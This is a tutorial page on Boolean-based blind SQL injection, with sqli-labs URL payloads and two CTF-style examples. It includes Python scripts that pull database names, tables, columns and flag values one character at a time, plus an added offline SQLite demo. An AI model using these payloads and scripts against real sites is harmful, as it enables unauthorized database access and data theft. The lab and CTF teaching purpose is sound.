SoFunction
Updated on 2024-11-13

Python Boolean-based blind SQL injection: principle and exploitation process, with examples

Introduction

An earlier article covered the basics and classification of SQL injection. That piece was broad rather than deep, so the plan is to go through each injection type in detail, with its exploitation methods and the scenarios it fits. Today's topic is Boolean-based blind injection, which is also one of the more commonly used injection techniques.

Basics

What is Boolean-based blind injection?

First, what "blind" means here. Normally, when we send a SQL statement through a web page, the page gives us some feedback about it, for example a SQL error message, and we carry out the injection based on those messages. But what if the page shows us nothing at all when we pass our statement in? That is where Boolean-based blind injection comes in: we inject conditional statements, watch which of two responses the page gives, and from that confirm the contents of the database one comparison at a time. The diagram below compares the two situations:

[Diagram: a page that echoes query results or errors, compared with a page that returns nothing usable]

Below is how we carry out a Boolean-based blind injection using a few functions against a page that has only two kinds of response.

Functions

These are the functions most commonly used in Boolean-based blind injection and what they do:

length(str): returns the length of the string str.

substr(str, pos, len): returns the substring of str that starts at position pos and is len characters long. Note that pos starts at 1, not at 0 as with array indexes.

mid(str, pos, len): same as above; extracts a substring.

ascii(str): returns the ASCII code of the leftmost character of the string str.

ord(str): same as above; returns the character code.

if(a, b, c): a is the condition; if a is true, returns b, otherwise returns c. For example, if(1>2,1,0) returns 0.

These are only the most common ones. When they are filtered, other functions can be found that do the same job. Here is an example of how they are used.

Under the Boolean rule the page only tells us TRUE or FALSE, so we pass a parameter like this:

http://127.0.0.1/Less-8/?id=1'and (length(database()))>8 --+

This tests whether the length of the database name is greater than 8: if it is, the page shows its TRUE response, otherwise its FALSE response.

Injection process

Assuming we have already determined the length of the database name, the next step is to guess its first character:

http://127.0.0.1/sqli-labs-master/Less-8/?id=1'and ascii(substr(database(),1,1))>110#

We narrow the value down by bisection. For instance, if >110 returns TRUE and >111 returns FALSE, the first character's ASCII code must be 111. (In sqli-labs the database is called security, so the actual first character is 's', ASCII 115.) An ASCII table gives the character for each code.

Likewise we change the substr position to look up the second character:

substr(database(),2,1)

The database name comes out as security. Next we look up the first character of the first table name in the same way:

1' and (ascii(substr((select table_name from information_schema.tables
 where table_schema='security' limit 0,1),1,1)))>100 --+

This gives the table name emails, so we query the first character of its first column name (limit 0,1 selects one column; substr needs a subquery that returns a single row):

1' and (ascii(substr((select column_name from information_schema.columns
 where table_name='emails' limit 0,1),1,1)))>100 --+

Finally we read the column's values the same way, with a select on the column and table we found as the subquery.
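To make the sequence above concrete, here is an added example that is not from the original article and does not touch the sqli-labs target it uses. It runs entirely offline: a constructed in-memory SQLite database stands in for the vulnerable site, page_returns_true plays the role of the page that only shows TRUE or FALSE, and the extraction uses the same length()/substr()/> probes, with SQLite's unicode() in place of MySQL's ascii() and sqlite_master/pragma_table_info in place of information_schema. The table and column names, the rows and the admin secret are all made up for the example. It also counts requests, so you can see that bisection costs about seven requests per character instead of up to 127.

```python
import sqlite3

# Constructed stand-in for the vulnerable site: an in-memory SQLite database
# playing the role of the MySQL "security" database on the page. Every name
# and row below is made up for this example.
conn = sqlite3.connect(":memory:")
conn.executescript("""
CREATE TABLE emails (id INTEGER, email_id TEXT);
INSERT INTO emails VALUES (1, 'Dumb@dhakkan.com'), (2, 'Angel@iloveu.com');
CREATE TABLE users (id INTEGER, username TEXT, password TEXT);
INSERT INTO users VALUES (1, 'Dumb', 'Dumb'), (2, 'admin', 's3cret!');
""")

stats = {"requests": 0}   # number of simulated HTTP requests sent


def page_returns_true(user_input: str) -> bool:
    """The vulnerable endpoint. user_input is concatenated into a quoted string
    literal, and the only thing the "page" reveals is whether the query
    produced a row (TRUE) or produced nothing / errored (FALSE)."""
    stats["requests"] += 1
    sql = "SELECT id FROM users WHERE id='" + user_input + "' LIMIT 1"
    try:
        return conn.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False   # the page shows nothing on error, same as FALSE


def blind_length(expr: str, max_len: int = 64) -> int:
    """Step 1 of the page's process: find length(expr) with length(..)>N probes."""
    lo, hi = 0, max_len            # the answer lies in [lo, hi]
    while lo < hi:
        mid = (lo + hi) // 2
        if page_returns_true(f"1' AND length(({expr}))>{mid} -- "):
            lo = mid + 1
        else:
            hi = mid
    return lo


def blind_char(expr: str, pos: int) -> str:
    """Step 2: recover character pos (1-based, as in substr) of expr by
    bisection on its code. SQLite's unicode() plays the role of MySQL's
    ascii(); the comparison logic is identical. Assumes ASCII output;
    raise hi for non-ASCII data."""
    lo, hi = 0, 127                # invariant: code > lo is TRUE, code > hi is FALSE
    while hi - lo > 1:
        mid = (lo + hi) // 2
        if page_returns_true(f"1' AND unicode(substr(({expr}),{pos},1))>{mid} -- "):
            lo = mid
        else:
            hi = mid
    return chr(hi)                 # code > lo but not > lo+1, so the code is hi


def extract(expr: str) -> str:
    """Dump the full string value of a scalar SQL expression, blind."""
    n = blind_length(expr)
    return "".join(blind_char(expr, i) for i in range(1, n + 1))


if __name__ == "__main__":
    # Same order as the page: table name -> column name -> data.
    table = extract("SELECT name FROM sqlite_master WHERE type='table' LIMIT 1 OFFSET 1")
    column = extract(f"SELECT name FROM pragma_table_info('{table}') LIMIT 1 OFFSET 2")
    secret = extract(f"SELECT {column} FROM {table} WHERE username='admin'")
    print(table, column, secret, "in", stats["requests"], "requests")
```

The two invariants in blind_char are what make the bisection correct: "> lo" is known TRUE and "> hi" is known FALSE, so when they are one apart the code must equal hi. Against a real MySQL target you would replace page_returns_true with an HTTP request and the comparison of the response against the page's TRUE marker, and swap unicode() back to ascii().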

You will have noticed that trying values one by one is very time-consuming, so we write a script to loop through it automatically. Examples follow.

Examples

Example 1

We are given a search box.

Trying some inputs, we find that entering 1 returns Hello, glzjin wants a girlfriend, entering 2 returns Do you want to be my girlfriend?, and any number greater than 2 returns Error Occured When Fetch Result. We also find that keywords such as union are filtered, but parentheses are not, which points to Boolean-based blind injection. So we try constructing a payload:

id=1^(if((ascii(substr((select(flag)from(flag)),1,1))=102),0,1))

The page responds normally, so SQL injection is possible (when the condition is TRUE the if() yields 0 and 1^0 is 1, which gives the id=1 page). We use a script:

import requests
import time

# Target URL as given on the page (the host part is incomplete there).
url = 'http://4f098f39-88d5-4922-afcc-06e3cfa8ac6e.:81/'
flag = ''
for i in range(1, 43):                      # the flag is assumed to be at most 42 characters
    hi = 127                                # invariant: ascii > lo is TRUE, ascii > hi is FALSE
    lo = 0
    for c in range(0, 127):
        s = (hi + lo) // 2
        # 0^1 = 1 -> the "Hello ..." page when the comparison is TRUE,
        # 0^0 = 0 -> a different page when it is FALSE
        payload = '0^(ascii(substr((select(flag)from(flag)),' + str(i) + ',1))>' + str(s) + ')'
        r = requests.post(url, data={'id': payload})
        time.sleep(0.005)
        if 'Hello, glzjin wants a girlfriend.' in r.text:
            lo = s
        else:
            hi = s
        if (hi - lo) <= 1:
            flag += chr(hi)                 # ascii > lo but not > lo+1, so the code is hi
            print(flag)
            break

Running it yields the flag.

Example 2

This is also a search box. Entering 1 and 1' respectively gives different responses:

Guessing that this is a Boolean-based blind injection, we start by testing the length of the database name:

1 and length(database()) >5

Having found that the length is 4, we query the name character by character:

1 and ascii(substr(database(),1,1))=115

This gives the database name sqli. The next step is to enumerate the tables, columns and data. I found a script online and adapted it to run against this target:

import requests

# Characters tried for names. Digits and '_' are not included, as on the page.
CHARSET = "sqcwertyuioplkjhgfdazxvbnm"


# Enumerate the database name
def dataBaseName(url, mark):
    name = ''
    for i in range(1, 9):
        for j in CHARSET:
            payload = url + "if(substr(database(),%d,1)='%s',1,0)" % (i, j)
            r = requests.get(payload)
            if mark in r.text:          # mark is the text shown only for a TRUE condition
                name = name + j
                print(name)
                break
    print('Database name:', name)
    return name


# Enumerate table names
def table_name(url, mark):
    tableList = []
    for i in range(0, 4):
        name = ''
        for j in range(1, 9):
            for k in CHARSET:
                payload = url + 'if(substr((select table_name from information_schema.tables where table_schema=database() limit %d,1),%d,1)="%s",1,0)' % (i, j, k)
                r = requests.get(payload)
                if mark in r.text:
                    name = name + k
                    print(name)
                    break
        tableList.append(name)
    print('table_name:', tableList)
    return tableList


# Enumerate the columns of the flag table
def column_name(url, mark):
    columnList = []
    for i in range(0, 3):
        columnName = ''
        for j in range(1, 9):
            for k in CHARSET:
                payload = url + 'if(substr((select column_name from information_schema.columns where table_name="flag" and table_schema = database() limit %d,1),%d,1)="%s",1,0)' % (i, j, k)
                r = requests.get(payload)
                if mark in r.text:
                    columnName += k
                    print(columnName)
                    break
        columnList.append(columnName)
    print("Field name:", columnList)
    return columnList


# Dump the first row of the flag column (linear search over printable ASCII)
def get_data(url, mark):
    data = ''
    for i in range(1, 50):
        for j in range(48, 126):
            payload = url + 'if(ascii(substr((select flag from flag),%d,1))=%d,1,0)' % (i, j)
            r = requests.get(payload)
            if mark in r.text:
                data += chr(j)
                print(data)
                break
    print("First value of field", data)
    return data


# Dump the next rows of the flag column. The page defined this under the same
# name as get_data, which silently replaced the function above; limit i,1 with
# i starting at 1 skips row 0, which get_data already printed.
def get_data_rows(url, mark):
    dataList = []
    for i in range(1, 10):
        data = ''
        for j in range(1, 50):
            for k in range(48, 126):
                payload = url + 'if(ASCII(SUBSTR((SELECT flag FROM `flag` limit %d,1),%d,1))=%d,1,0)' % (i, j, k)
                r = requests.get(payload)
                if mark in r.text:
                    data += chr(k)
                    print(data)
                    break
        dataList.append(data)
    print("Contents of the first 10 lines of the field", dataList)
    return dataList


if __name__ == "__main__":
    # The target URL is incomplete on the page; it must be the injection point
    # up to and including "1 and " so that the if(...) payload completes it.
    url = "/?query_success"
    # mark is not defined on the page: set it to the text the page shows
    # only when the injected condition is TRUE.
    mark = "REPLACE-WITH-TRUE-RESPONSE-TEXT"
    dataBaseName(url, mark)
    table_name(url, mark)
    column_name(url, mark)
    get_data(url, mark)
    get_data_rows(url, mark)

Concluding remarks

This article went through the principle of Boolean-based blind injection and the exploitation process in detail. Readers who are interested can set up their own target machine and try it. Corrections are welcome if anything here is wrong, and for more on Python-driven Boolean-based blind injection please see my other related articles!